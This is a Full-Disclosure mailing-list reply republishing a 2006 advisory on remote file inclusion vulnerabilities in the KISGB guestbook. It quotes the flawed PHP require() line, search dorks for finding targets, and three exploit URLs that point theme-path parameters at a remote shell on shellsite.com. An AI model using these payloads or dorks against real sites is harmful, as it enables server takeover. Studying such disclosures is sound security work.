Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB



Dear 0o_zeus_o0 elitemexico.org,

Thanks, published. http://www.security.nnov.ru/source13365.html

--Friday, December 22, 2006, 11:55:17 PM, you wrote to bugtraq@xxxxxxxxxx:

0eo> ###########################################################################
0eo> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
0eo> #
0eo> # Author: 0o_zeus_o0 ( Arturo Z. )
0eo> # Contact: zeus@xxxxxxxxxxxxxxx
0eo> # Website: www.diosdelared.com
0eo> # Date: 22/12/06
0eo> # Risk: critical
0eo> # Vendor Url: http://sourceforge.net/projects/kisgb,
0eo> http://ravenphpscripts.com
0eo> # Affected Software: Keep It Simple Guest Book
0eo> # search: inurl:kisgb , intitle:KISGB
0eo> #
0eo> #Info:
0eo> ##################################################################
0eo> #Bug is risky by since it is possible to be included I cosay malisioso
0eo> #that allows to see or to modify the archives
0eo> #code:
0eo> #if (isset($default_path_for_themes))
0eo> require("$default_path_for_themes/$theme");
0eo> #else require("$path_to_themes/$theme");
0eo> ##################################################################
0eo> #
0eo> #
0eo> #http://site/path/gbpath/authenticate.php?path_to_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/admin.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> ##################################################################
0eo> #VULNERABLE VERSIONS
0eo> ##################################################################
0eo> # 5.0.0
0eo> #
0eo> ##################################################################
0eo> #Contact information
0eo> #0o_zeus_o0
0eo> #zeus@xxxxxxxxxxxxxxx
0eo> #www.diosdelared.com
0eo> ##################################################################
0eo> #greetz: S.S.M, sams, a mi beba
0eo> #Original Advisory: http://diosdelared.com/15.txt
0eo> ##################################################################


--
~/ZARAZA
Ñòðåëÿÿ âî âòîðîé ðàç, îí èñêàëå÷èë ïîñòîðîííåãî. Ïîñòîðîííèì áûë ÿ. (Òâåí)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages